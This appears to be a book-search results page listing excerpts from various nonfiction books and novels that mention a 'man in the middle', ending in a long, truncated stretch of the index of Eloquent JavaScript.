A Declaration of the Independence of Cyberspace, Affordable Care Act / Obamacare, Airbnb, Albert Einstein, Amazon Web Services, autonomous vehicles, barriers to entry, bitcoin, Black Swan, blockchain, borderless world, business cycle, business intelligence, call centre, Cass Sunstein, cloud computing, cognitive bias, commoditize, computer vision, corporate governance, cryptocurrency, data acquisition, DevOps, don't be evil, Donald Trump, Edward Snowden, Exxon Valdez, global village, immigration reform, Infrastructure as a Service, Internet of things, Jeff Bezos, Julian Assange, Kubernetes, Mark Zuckerberg, Metcalfe’s law, MITM: man-in-the-middle, move fast and break things, Network effects, open borders, platform as a service, Ponzi scheme, ransomware, Richard Thaler, Sand Hill Road, Schrödinger's Cat, self-driving car, shareholder value, Silicon Valley, Silicon Valley startup, Skype, smart cities, Snapchat, software as a service, Steven Levy, Stuxnet, technoutopianism, Tim Cook: Apple, undersea cable, WikiLeaks, Y2K, zero day

Against his initial instincts, he green-lit an audacious idea from his incident response team, who argued that instead of trying to get the adversary out of the network quickly, they needed to keep the adversary inside their network, to try to understand their intent and interests. They proposed firewalling off the intruder to limit what information he could access, and then doing their own man-in-the-middle attack to compromise his command and control and learn his tactics and techniques. “I’ve been on the job for three months, and I’m like, ‘Holy shit, you’ve got to be kidding me.’” But Gagnon saw the value in the intelligence he could collect. “So, I said I will do this once, but I will never do it again.” But he did do it again. In fact, he did it more than two thousand times. That first incident made Gagnon realize that the attacks his company was suffering were not opportunistic, but rather well planned.


pages: 469 words: 124,784

Moon Shot: The Inside Story of America's Apollo Moon Landings by Jay Barbree, Howard Benedict, Alan Shepard, Deke Slayton, Neil Armstrong

Charles Lindbergh, clockwatching, gravity well, invisible hand, Kickstarter, low earth orbit, MITM: man-in-the-middle, operation paperclip, orbital mechanics / astrodynamics, place-making

They were test pilots, and he understood them. He was a superb boss. Alan, as chief of the Astronaut Office, was responsible for day-to-day operations. Astronauts were needed for spacecraft tests, for design reviews, for newspaper interviews. With equanimity, he distributed these seemingly limitless tasks to a very limited number of “his boys.” He was an impenetrable barrier to inappropriate or untimely requests. He was “the man in the middle” and handled it well. Moon Shot is their story. Much more than the story of their flights in space, it details their central role in the most exciting adventure in history. Jay Barbree, one of the world’s most experienced space journalists, reported the triumphs and the tragedies from the dawn of the space age. He is exceptionally well qualified to recall and record the remarkable events and emotions of the time.


pages: 468 words: 124,573

How to Build a Billion Dollar App: Discover the Secrets of the Most Successful Entrepreneurs of Our Time by George Berkowski

Airbnb, Amazon Web Services, barriers to entry, Black Swan, business intelligence, call centre, crowdsourcing, disruptive innovation, en.wikipedia.org, game design, Google Glasses, Google Hangouts, Google X / Alphabet X, iterative process, Jeff Bezos, Jony Ive, Kickstarter, knowledge worker, Lean Startup, loose coupling, Marc Andreessen, Mark Zuckerberg, minimum viable product, MITM: man-in-the-middle, move fast and break things, Network effects, Oculus Rift, Paul Graham, QR code, Ruby on Rails, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, software as a service, software is eating the world, Steve Jobs, Steven Levy, Travis Kalanick, ubercab, Y Combinator

The best apps (and services, companies, etc. in general) can grow only if they are ‘net-adding’ users, i.e. they are adding more users than they are losing. That’s definitely not the easiest thing to do – and you’ll find that you’ll need to employ numerous simultaneous strategies to make it work. So what are the important things to get right in order to delight people? Design is one. If you’ve used the Hailo app you’ll have noticed there is a little blue man in the middle of the app who denotes your current location. In the very first version of Hailo, this little blue guy (whose nickname is Barty – named after a summer intern) was just a blue pin. The pin was clear, simple and well recognised. One of our designers – a rather emo-looking fellow, who plays in a band, loves tattoos and used to make video games at Electronic – didn’t think it was good enough. One day he told me he wasn’t happy with this impersonal feel of our passenger app; he said it was lacking something.


pages: 381 words: 120,361

Sunfall by Jim Al-Khalili

airport security, artificial general intelligence, augmented reality, Carrington event, cosmological constant, cryptocurrency, dark matter, David Attenborough, Fellow of the Royal Society, Intergovernmental Panel on Climate Change (IPCC), Internet of things, invisible hand, Kickstarter, mass immigration, megacity, MITM: man-in-the-middle, off grid, pattern recognition, Silicon Valley, smart cities, sorting algorithm, South China Sea, stem cell, Stephen Hawking, Turing test

Any attempt to break the code disturbs the delicate quantum entangled state and sends an alert to the source, which then immediately switches to a different encryption key. Wasn’t that the subject of last week’s lecture – something about the Ekert 91 protocol?’ Shireen grinned, suddenly feeling even more pleased with herself. ‘I know, foolproof, right? And you know as well as I do that every cyb in the world is looking for new attack strategies that target vulnerabilities in the system. And if you ask any of them they’ll tell you that the obvious man-in-the-middle attacks and the photon number splitting attacks don’t work. In fact, government and corporation sites don’t even bother following up on these cyber alerts any more. And that’s the beauty of it; they’re so cocksure their encryptions can’t be broken that no one is watching me.’ ‘And that’s what you think you’ve done, is it? You’ve found a way of getting hold of a quantum encryption key without detection … a window where the laws of physics are no longer in control?’


pages: 481 words: 121,300

Why geography matters: three challenges facing America : climate change, the rise of China, and global terrorism by Harm J. De Blij

agricultural Revolution, airport security, Anton Chekhov, Ayatollah Khomeini, Berlin Wall, British Empire, colonial exploitation, complexity theory, computer age, crony capitalism, demographic transition, Deng Xiaoping, Eratosthenes, European colonialism, F. W. de Klerk, failed state, Fall of the Berlin Wall, Francis Fukuyama: the end of history, global village, illegal immigration, Internet Archive, John Snow's cholera map, Khyber Pass, manufacturing employment, megacity, Mercator projection, MITM: man-in-the-middle, Nelson Mandela, out of africa, RAND corporation, risk tolerance, Ronald Reagan, South China Sea, special economic zone, Thomas Malthus, trade route, transatlantic slave trade, UNCLOS

problems, France's quarrel with the United States over Iraq, prospects for the euro and EU enlargement, and the issue of a European Constitution, then very much in the news while it was being prepared, a momentous event in the EU's history. I went on too long and left no time for a Q&A session, but asked anyone with comments to come up to the lectern afterward. Soon a group of about a dozen listeners converged on me, and I could see that some of them were quite angry. "You were unfair to Germany's government!" shouted a man in the middle of the pack. Before I could answer, someone started a bitter complaint about my view of the French. "No," said the vociferous German, "he was quite right about you French. You want to run the European Union, but the British won't let you do it." In a few moments the Europeans among the group were in a shouting match with each other, no longer interested in arguing with me. When I left the room the dispute continued undiminished.


pages: 385 words: 133,839

The Coke Machine: The Dirty Truth Behind the World's Favorite Soft Drink by Michael Blanding

carbon footprint, clean water, collective bargaining, corporate social responsibility, Exxon Valdez, Gordon Gekko, Internet Archive, laissez-faire capitalism, market design, MITM: man-in-the-middle, Naomi Klein, Nelson Mandela, New Journalism, Ponzi scheme, profit motive, Ralph Nader, rolodex, Ronald Reagan, shareholder value, The Wealth of Nations by Adam Smith, Thorstein Veblen, union organizing, Upton Sinclair

He sends her to school with bodyguards and forbids her to go outside. “Sometimes she asks me why she can’t go out and play like a normal girl,” he says. “But it would destroy me as a person if anything happened to her.” After the initial spate of violence, the threats against the union subsided somewhat, but not before Galvis himself was subject to attack. He was driving home with his bodyguards in August 2003, when he turned the corner to find a man in the middle of the street pointing a pistol at the car. One of his bodyguards opened the door to shoot, and the man started firing. After a few exchanges of gunfire, the assailant drove off on his motorbike, and Galvis reported the incident to the police as an attempt on his life. He heard nothing until 2007 when the attorney general’s office informed him there was an investigation against him for making a false claim.


Jennifer Morgue by Stross, Charles

call centre, correlation does not imply causation, disintermediation, dumpster diving, Etonian, haute couture, interchangeable parts, Maui Hawaii, MITM: man-in-the-middle, mutually assured destruction, planetary scale, RFID, Silicon Valley, Skype, slashdot, stem cell, telepresence, traveling salesman, Turing machine

SLIDE 3: Grainy black-and-white photographs, evidently taken from TV screens: a long cylindrical structure grasped in the claws of an enormous grab. From below, thin streamers rise up towards it. "BLUE HADES took exception to the intrusion into their territory and chose to exercise their salvage rights under Article Five, Clause Four of the Benthic Treaty. Hence the tentacles. Now ..." SLIDE 1 (Repeat): This time the man in the middle is circled with a red highlighter. "This fellow in the middle is Ellis Billington, as he looked thirty years ago. Ellis was brilliant but not well socialized back then. He was attached to the 'B' team as an observer, tasked with examining the circuitry of the cipher machine they hoped to recover from the sub's control room. I didn't pay much attention to him at the time, which was a mistake.


Rainbows End by Vernor Vinge

Drosophila, failed state, MITM: man-in-the-middle, technological singularity, Vernor Vinge

It would be a gross under-employment of everyone’s talent. If this is the scam, you will be the heroes of the day, my hands in disabling those little boxes you and your friends planted — but your fame will likely be posthumous. My condolences! (2) To sabotage some component of the labs, maybe in a way that won’t become evident till much later disasters. This is almost as stupid as (1). (3) To install (or cover) some fiendishly clever Man-in-the-Middle software that gives Alfred de facto ownership of research done in that part of lab that you, Robert, infested for him. This would be cool, and it is my personal favorite (see my discussion of fruit flies in Chapter 3). Unfortunately for Alfred, this caper is so far blown that I doubt it will survive the audits that will surely come raining down. In this case, you two can help by grabbing anything that Alfred has not yet hidden


pages: 436 words: 131,430

House of God by Samuel Shem

affirmative action, index card, lateral thinking, medical residency, MITM: man-in-the-middle, Norman Mailer, placebo effect

We entered, the music stopped, all heads turned to us. The Law. Silence. 'Too calm,' I whispered to Quick as we watched the barkeep slowly mop the floor and deny any shooting in his establishment. Then Quick supplied the clue." "The slop the barman mopped was red. Beer is not red, and yet red blood is," said Quick. "I then spotted three men sitting too close together against the wall, and commanded them to move. They did, and the man in the middle fell over, dead. Such was their surprise that we refrained from having to 'stick them' with our lead nightsticks, thus avoiding many months of work with Cohen around the gnawing question of guilt. A dangerous time." "The raw red time when words give way to acts," said Quick. "We must all take care," said the redhead. "With luck we shall see you again at sixteen hundred in the fine post meridian.


pages: 416 words: 129,308

The One Device: The Secret History of the iPhone by Brian Merchant

Airbnb, animal electricity, Apple II, Apple's 1984 Super Bowl advert, citizen journalism, Claude Shannon: information theory, computer vision, conceptual framework, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, Ford paid five dollars a day, Frank Gehry, global supply chain, Google Earth, Google Hangouts, Internet of things, Jacquard loom, John Gruber, John Markoff, Jony Ive, Lyft, M-Pesa, MITM: man-in-the-middle, more computing power than Apollo, Mother of all demos, natural language processing, new economy, New Journalism, Norbert Wiener, offshore financial centre, oil shock, pattern recognition, peak oil, pirate software, profit motive, QWERTY keyboard, ride hailing / ride sharing, rolodex, Silicon Valley, Silicon Valley startup, skunkworks, Skype, Snapchat, special economic zone, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, Tim Cook: Apple, Turing test, uber lyft, Upton Sinclair, Vannevar Bush, zero day

“They would be able to sniff the traffic,” he says, meaning intercept the data passing through the network. “Once you’re connected to the network, they could start trying to throw attacks at your phone… But for the most part, the Pineapple is more for sniffing traffic.” If I logged on to Gmail, for instance, the hackers could force me to go somewhere else, a site of their choosing. Then they could launch a man-in-the-middle attack. “If you went to Facebook and went to your bank account, they’d be able to see that information too,” he says. “So, yeah, you just want to be careful not to connect to any Wi-Fi.” Okay, but how common is this, really? “Pineapples?” Ronnie says. “I can go buy one for a hundred, a hundred twenty bucks. They’re very, very, very common. Especially here.” Def Con is one of the largest and most notorious hacker gatherings in the world.


pages: 403 words: 138,026

Arabian Sands by Wilfred Thesiger

back-to-the-land, clean water, Etonian, Fellow of the Royal Society, MITM: man-in-the-middle, the market place

As I wandered through the town I knew that they regarded me as an intruder; I myself felt that I was little better than a tourist. I could have gone to Bahrain by aeroplane from Sharja but I preferred to go there by dhow. The journey should have taken four days but lasted eleven. The naukhada, or skipper, was an old man, nearly blind, who spent most of his time asleep on the poop. The mate, an energetic Negro, described what he saw and the naukhada told him where to go. Once he woke the old man in the middle of the night to consult him. The naukhada gave his orders, but when the mate said ‘Nonsense, Uncle!’, he went grumbling back to sleep. The first night it blew a gale. The seas broke over the ship and I was very sick. We had to shelter under the Persian coast, and there we remained for three days, since the wind, when it moderated, was against us. While waiting for the wind to shift, we were joined by seven other dhows, great ocean-going booms, sailing back from Zanzibar to Kuwait.


Eloquent JavaScript by Marijn Haverbeke

always be closing, domain-specific language, Donald Knuth, en.wikipedia.org, Firefox, hypertext link, job satisfaction, MITM: man-in-the-middle, premature optimization, slashdot, web application, WebSocket

., 2 leaf node, 229 leak, 225, 285 learning, 2, 6, 371 left (CSS), 240–242, 244 LEGO, 168 length property for arrays, 61, 336 for strings, 53, 56, 61, 74, 409 less than, 16 let keyword, 24, 25, 43, 65, 75, 76, 130 level, 266, 267, 273, 275, 284 Level class, 267 lexical scoping, 44 library, 230, 334, 356, 357 license, 169 line, 24, 32, 161, 287, 289–294, 307, 420 line break, 14, 161 line comment, 35, 156 line drawing, 350, 424 line width, 290, 297 lines of code, 211 lineTo method, 290–291 lineWidth property, 290 link (HTML tag), 277 linked list, 79, 410, 426 links, 222, 230–231, 251, 252, 344 linter, 173 Liskov, Barbara, 96 list (exercise), 79, 410 listen method, 360 listening (TCP), 220, 360 literal expression, 23, 146, 206, 208 live data structure, 227, 233, 240, 419 live view, 372, 373, 387, 426 lives (exercise), 285 load event, 258, 295–296, 303, 326, 421 LoadButton class, 344 local binding, 48, 215, 409 local scope, 43, 212 localhost, 360 localStorage object, 326–327, 383 locked box (exercise), 141, 413 logging, 133 logical operators, 17 long polling, 372–374, 378, 380, 385 loop, 4, 30, 32, 37, 38, 50, 69, 85, 90, 91, 160, 189, 408, 409, 420 termination of, 33 loop body, 31, 85 lycanthropy, 60, 66 M machine code, 3, 213, 391 macro-optimization, 406 magic, 99, 203 mailRoute array, 123 maintenance, 169 malicious script, 224 man-in-the-middle, 317 map, 272, 321 map (data structure), 104 Map class, 105, 109, 195 map method, 88, 91, 94, 99, 104, 120, 191, 268, 340 Marcus Aurelius, 246 match method, 149, 159 matching, 146, 151, 152, 158, 164 algorithm, 152–154 Math object, 56, 61, 75 Math.abs function, 76, 424 Math.acos function, 75 Math.asin function, 75 Math.atan function, 75 Math.ceil function, 76, 278, 302–303 Math.cos function, 75, 241, 242, 421 mathematics, 50, 86 Math.floor, 76, 122, 278, 302–303 Math.max function, 27, 61, 74, 75, 302 Math.min function, 27, 56, 75, 302 Math.PI constant, 75, 293 Math.random function, 75, 122, 271, 330, 404 Math.round function, 
76 Math.sin function, 75, 241, 242, 271, 281 Math.sqrt function, 68, 75, 411 Math.tan function, 75 Matrix class, 107–108, 335 matrix example, 107–108, 111 MatrixIterator class, 108 max-height (CSS), 275–276 maximum, 27, 75, 90 max-width (CSS), 275–276 McConnell, Steve, 390 Meadowfield, 117 measurement, 397 measuring, 399 measuring a robot (exercise), 125, 412 media type, 317, 329, 365 meetups, JavaScript, 371 memory, 3, 11 call stack, 24 organization, 12, 47, 60, 65, 77 persistence, 387 speed, 181, 213, 400, 402, 406 structure sharing, 79 mesh, 221 message event, 259 meta key, 252 metaKey property, 252, 349 method, 62, 100, 101 array, 71 HTTP, 312, 317, 360, 367, 373, 375 interface, 98 method attribute, 313 method call, 98 method property, 315 methods object, 363 micro-optimization, 397, 399, 406 Microsoft, 225 Middle East, graph of, 393 mime package, 365 MIME type, 329, 365 mini application, 326 minifiers, 175 minimalism, 265 minimum, 27, 56, 75 minimum (exercise), 56, 408 minus, 13, 165 Miró, Joan, 332 mirror, 298, 308, 421 mirroring, 297–298 MKCOL method, 368–369, 425 mkdir function, 368–369, 425 modification date, 366 modifier key, 252 modular robot (exercise), 177, 414 modularity, 97, 334 module, 168, 169, 177, 272, 355, 356, 375 design, 175 module loader, 355 module object, 172 module system, 169 modulo (remainder) operator, 14, 33, 297, 407, 408, 418, 420 Mongolian vowel separator, 162 monster (exercise), 285, 419 Mosaic, 225 motion, 266 mouse, 26 button, 249, 250, 253 cursor, 253 mouse trail (exercise), 262, 418 mousedown event, 250, 253, 255, 337, 338, 422 mousemove event, 254, 260–262, 338, 350, 418 mouseup event, 253–255 moveTo method, 290, 293 Mozilla, 225 multiple attribute, 324, 325 multiple-choice, 318–319, 323, 324 multiplication, 13, 269–270, 280 multiplier function, 49 music, 265 mutability, 63, 65, 120 N name attribute, 320, 324 namespace, 75 naming, 4, 5, 25–26 NaN (not a number), 14, 17, 18, 130 negation, 16, 17 neighbor, 330, 422 neighbors 
property, 190 nerd, 158 nesting of arrays, 67 of expressions, 23, 205 of functions, 44 of loops, 38, 408 of objects, 228, 231 in regular expressions, 154 of scope, 44 Netscape, 5, 225 network, 182, 219, 372 abstraction, 194, 316 protocol, 220 reliability, 188 security, 317 speed, 174, 181, 353 network function, 194 new operator, 101 newline character, 14, 38, 147, 156, 161, 268, 422 next method, 107, 197, 412 nextSibling property, 230 Nietzsche, Friedrich, 226 node, 228, 229 node program, 354 node-fetch package, 361 Node.js, 6, 7, 27, 171, 183, 353–369, 372, 373, 375, 387, 398 NodeList type, 230, 239 node_modules directory, 355, 356 nodeName property, 243 nodeType property, 229, 418, 419 nodeValue property, 231 nonbreaking space, 162 normalizing, 396 not a number (NaN), 14, 17, 18, 129 notation, 173 note-taking example, 327 notification, 372 NPM, 169, 171, 173, 174, 176, 177, 355–358, 365, 375, 376, 387, 415 npm program, 356, 357, 365 null, 18, 19, 51, 61, 77, 80, 134 number, 12, 65, 146, 165, 414 conversion to, 19, 28 notation, 12–13 precision of, 13 representation, 12 special values, 14 Number function, 28, 35 number puzzle example, 50–52 Number.isNaN function, 29 O object, 59, 63–65, 97, 112 creation, 77, 101, 328, 401, 403 identity, 65 as map, 272 as module, 169 mutability, 65 property, 27, 61, 75, 76, 99 representation, 77 Object prototype, 99, 100 object shape, 404 Object.assign function, 328, 336 Object.create function, 100, 104, 211 Object.keys function, 64, 80, 195, 410, 417 object-oriented programming, 97, 101, 105, 106, 111, 119, 175 Object.prototype, 104 observation, 399 obstacle, 277, 278 offsetHeight property, 235, 236 offsetWidth property, 235 on method, 362 onclick attribute, 224, 248 onclick property, 337 OpenGL, 289 opening tag, 222 operator, 13, 16, 19, 204, 210, 404 application, 13 optimization, 50, 55, 236, 260, 266, 275, 306, 308, 359, 392, 398–400, 403, 406, 426 option (HTML tag), 319, 324, 425 optional, in pattern, 148 optional arguments, 
48, 78 options property, 324 ordering, 220 ordinal package, 171–172 organic growth, 167 organization, 167 outline, 289 output, 16, 26, 27, 133, 134, 211, 353, 422 overflow (CSS), 275–276 overflow, with numbers, 12 overlap, 278 overlay, 238 overriding, 103, 105, 111, 415 overwriting, 367, 369, 378 P p (HTML tag), 222, 235 package, 168, 171, 355, 357 package (reserved word), 26 package manager, 169 package.json file, 357 padding (CSS), 274 page reload, 258, 321, 326 pageX property, 253, 255 pageXOffset property, 236 pageY property, 253, 255 pageYOffset property, 236, 257 Palef, Thomas, 265 panning, 339 paragraph, 222 parallelism, 182, 313 parameter, 27, 42, 43, 46–48, 74, 76, 99, 131, 172 parent node, 249 parentheses arguments, 23, 41, 46, 85, 204 expression, 13 in regular expressions, 149, 151, 152, 162, 413 statement, 27, 29, 31, 33 parentNode property, 230 parse function, 207 parseApply function, 206 parseExpression function, 205 parseINI function, 161, 168 parsing, 77, 129, 161, 203–206, 208, 211, 223, 227, 364, 380 password, 317 password field, 318 path canvas, 290–293, 420 closing, 291 file system, 355, 363 URL, 312, 315, 363, 364, 373, 375 path package, 365 pathfinding, 123, 176, 193, 343 pathfinding (exercise), 405, 406, 426 patience, 350 pattern, 145–147, 157 pausing (exercise), 285, 419 pea soup, recipe analogy, 84 peanuts, in weresquirrel example, 70–71 percent sign, 314 percentage, 94, 257 performance, 154, 174, 212, 236, 266, 306, 359, 391, 393, 397, 399 period character, 27, 61, 74, 147, 156, 165, 336 persistence, 326, 372, 387, 425 persistent data structure, 119, 120, 126, 132, 335, 342, 346, 419 persistent group (exercise), 126 persistent map (exercise), 413 PGroup class, 126, 413 phase, 271, 281 phi coefficient, 66–68 phi function, 68, 76 phone, 252 physics, 277, 281, 393, 418 physics engine, 278 pi, 13, 75, 241, 271, 293 PI constant, 75, 242 pick function, 343 picture, 287, 288, 296, 306, 334, 346 Picture class, 335, 345 picture property, 335 
PictureCanvas class, 337, 349 pictureFromImage function, 345 pie chart example, 294, 295, 307, 420 ping request, 190 pink, 336 pipe analogy, 220 pipe character, 152, 414 pipe method, 364, 367 pipeline, 175 pixel, 235, 242, 253, 267, 273, 288, 289, 295, 296, 302, 306, 308, 333, 335, 339, 342, 343, 345, 350, 423 pixel art, 296 PixelEditor class, 340, 347, 349 pizza, in weresquirrel example, 67 platform game, 265, 285 Plauger, P.J., 128 player, 265–267, 275, 278, 281, 284, 296, 303, 305 Player class, 270, 281 plus character, 13, 148, 165 pointer, 230 pointer events, 253–256, 337 pointerPosition function, 338 polling, 247 pollTalks function, 385 polymorphism, 105–106 pop method, 62, 71 Popper, Karl, 234 port, 220, 311, 360 pose, 296 position, of elements on screen, 236 position (CSS), 240, 244, 257, 266, 275 POST method, 313, 314, 321, 374 postMessage method, 259 power example, 42, 48, 50 precedence, 13, 17, 239 predicate function, 88, 92, 95 Prefer header, 374, 380, 385 premature optimization, 50 preventDefault method, 251, 256–258, 282, 321, 339, 423 previousSibling property, 230 primitiveMultiply (exercise), 141, 413 privacy, 225 private (reserved word), 26 private properties, 98, 141–142 process object, 354–355, 364–365 processor, 181, 400 profiling, 50, 399 program, 2, 23, 28 program size, 83, 84, 164, 272 programming, 1 difficulty of, 2 history of, 3 joy of, 1, 2 Programming Is Terrible, 166 programming language, 1–2 creating, 203, 213 DOM, 229 history of, 3 machine language and, 391 Node.js and, 354 power of, 5 programming style, 3, 24, 32, 35, 272 progress bar, 256 project chapter, 117, 203, 265, 333, 371 promise, 200, 416 Promise class, 186, 187, 189, 195, 197, 198, 200, 315, 326, 359, 361, 363, 386, 416 Promise.all function, 190, 199, 200, 416 Promise.reject function, 187 Promise.resolve function, 186, 190 promises package, 359 promptDirection function, 139 promptInteger function, 134 propagation, of events, 249, 250, 257, 258 proper lines (exercise), 350, 
424 property access, 27, 61, 129, 348, 403 assignment, 63 definition, 63, 66, 109 deletion, 63, 98 inheritance, 99, 101, 103 model of, 63 naming, 105–107 testing for, 64 protected (reserved word), 26 protocol, 220, 221, 311–312 prototype, 99–104, 111, 211, 215, 417, 426 diagram, 103 prototype property, 101 pseudorandom numbers, 75 public (reserved word), 26 public properties, 98 public space (exercise), 369, 425 publishing (packages), 358 punch card, 3 pure function, 55, 79, 88, 175, 330, 422 push method, 62, 69, 71, 411, 426 pushing data, 372 PUT method, 312–313, 363, 367, 373, 378, 425 Pythagorean theorem, 411, 423 Python, 391 Q quadratic curve, 292 quadraticCurveTo method, 292, 420 query string, 314, 374, 380 querySelector method, 240, 417 querySelectorAll method, 239, 324 question mark, 18, 148, 157, 314 queue, 198 quotation mark, 14, 165 quoting in JSON, 77 of object properties, 63 quoting style (exercise), 165, 413 R rabbit example, 98, 100–102 radians, 242, 293, 298 radio buttons, 318, 323 radius, 350, 423 radix, 11 raising (exceptions), 135 random numbers, 75, 271 random-item package, 414 randomPick function, 122 randomRobot function, 122 range, 88, 147, 148 range function, 5, 78, 409 Range header, 316 ray tracer, 306 readability, 4, 5, 35, 50, 54, 135, 167, 208, 276, 307 readable stream, 361, 362, 364, 378 readAsDataURL method, 345 readAsText method, 326 readdir function, 359, 366, 425 readdirSync function, 425 read-eval-print loop, 354 readFile function, 172, 358, 425 readFileSync function, 359, 424 reading code, 6, 117 readStorage function, 184 readStream function, 378, 379 real-time events, 247 reasoning, 17 recipe analogy, 84 record, 62 rect (SVG tag), 288 rectangle, 266, 278, 289, 307, 342 rectangle function, 342, 423 recursion, 47, 50, 56, 80, 189, 195, 205, 206, 208, 231, 243, 300, 394, 408, 410, 413, 416, 418 reduce method, 89, 91, 94, 95, 340, 411 redundancy, 397 ReferenceError type, 215 RegExp class, 146, 157, 424 regexp golf (exercise), 164 
regular expressions, 145–165, 206, 368, 375, 376, 417, 424 alternatives, 152 backtracking, 153 boundary, 151 creation, 146, 157 escaping, 146, 158, 414 flags, 149, 155, 157, 414 global, 155, 158, 159 grouping, 149, 155 internationalization, 162 matching, 152, 158 methods, 146, 150, 158 repetition, 148 rejecting (a promise), 187, 189, 198 relative path, 172, 224, 355, 363, 425 relative positioning, 240, 241 relative URL, 315 remainder (modulo) operator, 14, 33, 297, 407, 408, 418, 420 remote access, 363 remote procedure call, 316 removeChild method, 232 removeEventListener method, 248, 419 removeItem method, 326 rename function, 359 rendering, 289 renderTalk function, 384 renderTalkForm function, 385 renderUserField function, 383 repeat method, 73, 257 repeating key, 251 repetition, 52, 148, 154, 157, 260 replace method, 155, 165, 413 replaceChild method, 233, 418 replaceSelection function, 322 reportError function, 383 repulsion, 393, 395 request, 185, 189, 220, 312, 313, 321, 360, 361, 367, 372 request function, 189, 361, 362 request type, 185 requestAnimationFrame function, 241, 258, 260, 283, 308, 418 requestType function, 190 require function, 171, 172, 178, 355, 356, 365, 375 reserved words, 26 resolution, 172, 355 resolve function, 364 resolving (a promise), 186, 187, 189, 198 resource, 220, 221, 312, 313, 317, 363, 377 response, 185, 189, 312, 313, 316, 360, 364, 366 Response class, 315 responsiveness, 247, 353, rest parameters, 74 restore method, 299, 300 result property, 326 retry, 189 return keyword, 42, 47, 101, 196, 408, 411 return value, 27, 42, 134, 185, 410 reuse, 54, 112, 167–169, 356 reverse method, 79 reversing (exercise), 79, 409 rgb (CSS), 274 right-aligning, 243 rmdir function, 366, 368 roadGraph object, 118 roads array, 117 roads module (exercise), 177, 415 robot, 117, 119, 121, 123, 125, 177 robot efficiency (exercise), 125, 412 robustness, 373 root, 229 rotate method, 298, 300 rotation, 307, 420 rounding, 76, 134, 278, 279, 302, 424 router, 
372, 375 Router class, 375, 376 routeRequest function, 194 routeRobot function, 123 routing, 192 rows, in tables, 243 Ruby, 391 rules (CSS), 238, 239 run function, 211 runAnimation function, 283, 285 runGame function, 284, 285 runLayout function, 396 runLevel function, 283, 285 running code, 7 runRobot function, 121, 412 run-time error, 132–134, 140, 417 Rust (programming language), 391 S Safari, 225 sandbox, 7, 59, 224, 227, 316 save method, 299, 300 SaveButton class, 344 scalar replacement of aggregates, 400, 402 scale constant, 337–339 scale method, 297, 299 scaling, 273, 296, 297, 303, 421 scalpel (exercise), 200, 416 scheduling, 197, 354 scientific notation, 13, 165 scope, 43, 44, 48, 168, 170–173, 208, 210, 214, 215, 417 script (HTML tag), 223, 224, 258 SCRIPTS data set, 87, 89, 92, 93, 95 scroll event, 256, 260 scrolling, 251, 256–257, 275–276, 282, 301 search method, 158 search problem, 124, 152, 154, 232, 368, 405 search tool (exercise), 368, 424 section, 161 Secure HTTP, 221, 317, 361 security, 224, 225, 316, 317, 325, 327, 364, 375 select (HTML tag), 319, 324, 327, 334, 340, 425 selected attribute, 324 selection, 322 selectionEnd property, 322 selectionStart property, 322 selector, 239 self-closing tag, 222 semantic versioning, 357 semicolon, 23, 24, 33, 237 send method, 185, 188 sendGossip function, 191 sep binding, 364–365 sequence, 148 serialization, 77 server, 220, 221, 311–313, 315, 316, 353, 360, 362, 363, 372, 375 session, 328 sessionStorage object, 328 set, 146, 147, 229 Set (data structure), 113, 126 Set class, 113, 126, 413 set method, 105 setAttribute method, 235, 337 setInterval function, 260, 296 setItem method, 326 setter, 110 setTimeout function, 184, 197, 259, 260, 380, 386 shape, 287, 290, 291, 293, 295, 307 shapes (exercise), 307, 420 shared property, 100, 103 SHIFT key, 252, 423 shift method, 71 shiftKey property, 252 short-circuit evaluation, 20, 51, 209, 411 SICP, 202 side effect, 24, 27, 34, 42, 54, 65, 79, 88, 159, 175, 199, 230, 
232, 233, 236, 290, 299, 314, 334, 335 sign, 12, 165, 414 sign bit, 12 signal, 11 simplicity, 213 simulation, 119, 121, 265, 270, 330, 393, 418 sine, 75, 241, 271, 281 single-quote character, 14, 165, 224 singleton, 126 skill, 333 SkillShareApp class, 386 skill-sharing project, 371–373, 375, 381 skipSpace function, 206, 214 slash character, 13, 35–36, 146, 156, 315, 364, 425 slice method, 72, 73, 88, 233, 409, 416 slope, 424 sloppy programming, 261 smooth animation, 241 SMTP, 220 social factors, 349 socket, 372–373 some method, 92, 95, 191, 376, 426 sorting, 229 source property, 158 special form, 203, 208 special return value, 134, 135 specialForms object, 208 specificity, 239 speed, 1, 2, 308, 421 SpiderMonkey, 400 spiral, 307, 420 split method, 118, 268 spread, 74, 336 spread operator, 274 spring, 393, 395 sprite, 296, 303–304 spy, 256 square, 28 square brackets, 60, 61, 74, 76, 107, 147, 324, 328, 409 square example, 41–42, 45, 46 square root, 68, 75, 411 src attribute, 222, 224 stack, see call stack stack overflow, 47, 50, 56, 408 stack trace, 136 staged compilation, 392 standard, 5, 26, 35, 88, 136, 162, 349, 354, 355 standard environment, 26 standard output, 354, 362–363 standards, 219, 225 star, 307, 420 Star Trek insignia, 292 startPixelEditor function, 347 startState constant, 347 startsWith method, 364 stat function, 359, 365, 366, 425 state of application, 275, 334, 342, 346, 347, 388 in binding, 24, 31, 32, 34, 400 of canvas, 289, 299 in iterator, 197 in objects, 119, 268, 301 transitions, 198, 336, 337 statement, 23, 24, 28, 31, 32, 42, 63 static (reserved word), 26 static file, 373, 376 static method, 110, 113, 268, 413 static typing, 403 Stats type, 366 statSync function, 425 status code, 312, 354–355 status property, 315, 383 stdout property, 362–363 stopPropagation method, 250 storage function, 187 stream, 220, 361–363, 364, 367, 378 strict mode, 130 string, 14, 60, 62, 65, 92 indexing, 56, 72, 74, 92, 149 length, 37, 92 methods, 73, 149 notation, 
